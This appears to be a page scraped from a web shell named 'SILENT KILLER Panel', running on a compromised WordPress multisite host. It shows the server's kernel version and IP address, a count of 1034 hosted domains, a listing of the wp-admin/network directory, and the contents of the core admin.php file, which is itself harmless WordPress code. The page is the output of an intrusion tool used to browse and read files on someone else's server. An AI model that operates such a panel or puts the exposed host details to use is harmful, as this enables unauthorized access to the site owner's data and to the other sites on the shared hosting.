SILENT KILLERPanel

Current Path: > home > codekrsu > > escapematrixonline.com > wp-admin > network > > >


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//escapematrixonline.com/wp-admin/network///

NameTypeSizeLast ModifiedActions
about.php File 245 bytes February 06 2020 11:33:12.
admin.php File 1024 bytes February 06 2020 11:33:12.
contribute.php File 255 bytes July 26 2023 01:34:28.
credits.php File 249 bytes February 06 2020 11:33:12.
edit.php File 908 bytes May 26 2020 13:37:10.
error_log File 28806 bytes August 04 2025 11:40:25.
freedoms.php File 251 bytes February 06 2020 11:33:12.
index.php File 2911 bytes March 09 2024 03:38:08.
menu.php File 4798 bytes February 08 2025 16:44:24.
plugin-editor.php File 266 bytes December 22 2021 01:06:02.
plugin-install.php File 377 bytes May 24 2020 13:17:10.
plugins.php File 249 bytes February 06 2020 11:33:12.
privacy.php File 249 bytes February 06 2020 11:33:12.
profile.php File 254 bytes February 06 2020 11:33:12.
settings.php File 21973 bytes February 08 2025 16:44:24.
setup.php File 247 bytes February 06 2020 11:33:12.
site-info.php File 7774 bytes May 04 2024 23:25:10.
site-new.php File 9571 bytes February 08 2025 16:44:24.
site-settings.php File 5626 bytes August 18 2023 01:03:20.
site-themes.php File 6875 bytes September 03 2024 22:19:14.
site-users.php File 11289 bytes February 08 2025 20:53:18.
sites.php File 13571 bytes February 08 2025 16:44:24.
theme-editor.php File 264 bytes December 22 2021 01:06:02.
theme-install.php File 374 bytes May 24 2020 13:17:10.
themes.php File 15989 bytes February 08 2025 16:44:24.
update-core.php File 253 bytes February 06 2020 11:33:12.
update.php File 450 bytes April 05 2020 07:02:12.
upgrade.php File 4966 bytes May 11 2024 18:38:14.
user-edit.php File 253 bytes February 06 2020 11:33:12.
user-new.php File 5228 bytes February 08 2025 16:44:24.
users.php File 9494 bytes February 08 2025 16:44:24.

Reading File: /home/codekrsu//escapematrixonline.com/wp-admin/network////admin.php

<?php
/**
 * WordPress Network Administration Bootstrap
 *
 * @package WordPress
 * @subpackage Multisite
 * @since 3.1.0
 */

define( 'WP_NETWORK_ADMIN', true );

/** Load WordPress Administration Bootstrap */
require_once dirname( __DIR__ ) . '/admin.php';

// Do not remove this check. It is required by individual network admin pages.
if ( ! is_multisite() ) {
	wp_die( __( 'Multisite support is not enabled.' ) );
}

$redirect_network_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) );

/**
 * Filters whether to redirect the request to the Network Admin.
 *
 * @since 3.2.0
 *
 * @param bool $redirect_network_admin_request Whether the request should be redirected.
 */
$redirect_network_admin_request = apply_filters( 'redirect_network_admin_request', $redirect_network_admin_request );

if ( $redirect_network_admin_request ) {
	wp_redirect( network_admin_url() );
	exit;
}

unset( $redirect_network_admin_request );

SILENT KILLER Tool